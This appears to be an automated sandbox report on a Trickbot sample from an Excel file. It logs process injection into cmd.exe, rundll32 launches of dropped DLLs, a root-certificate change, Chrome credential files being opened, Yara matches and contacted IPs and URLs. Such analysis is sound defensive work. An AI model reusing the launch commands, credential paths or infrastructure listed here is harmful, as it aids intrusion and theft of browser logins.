Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18009A000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18009A000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800B5000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800B5000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800BA000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800BA000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 150000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 260000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 260000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 280000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 290000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 4B0000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 49D790B4	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18005D000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18005D000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180079000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180079000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW	Jump to behavior

Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wermgr.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Windows\System32\wermgr.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Remote Access Functionality:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
144.208.70.30	deluciaspizza.com	United States	22611	IMH-WESTUS	false
117.54.250.246	unknown	Indonesia	9340	INDONET-AS-APINDOInternetPTID	true
188.18.7.133	unknown	Russian Federation	12389	ROSTELECOM-ASRU	true
103.102.220.50	unknown	Afghanistan	137039	ZT-AS-APZohakTechnologyZ-TechAF	false
54.243.154.178	elb097307-934924932.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false

Contacted Domains

Name	IP	Active
elb097307-934924932.us-east-1.elb.amazonaws.com	54.243.154.178	true
3.52.17.84.cbl.abuseat.org	127.0.0.2	true
deluciaspizza.com	144.208.70.30	true
3.52.17.84.zen.spamhaus.org	unknown	unknown
api.ipify.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/?format=text	false		high
https://103.102.220.50:443/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll	ReversingLabs: Detection: 32%
Source: C:\Users\user\fndskfnds.dfm	ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Heur.31681.xls

ReversingLabs: Detection: 12%

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

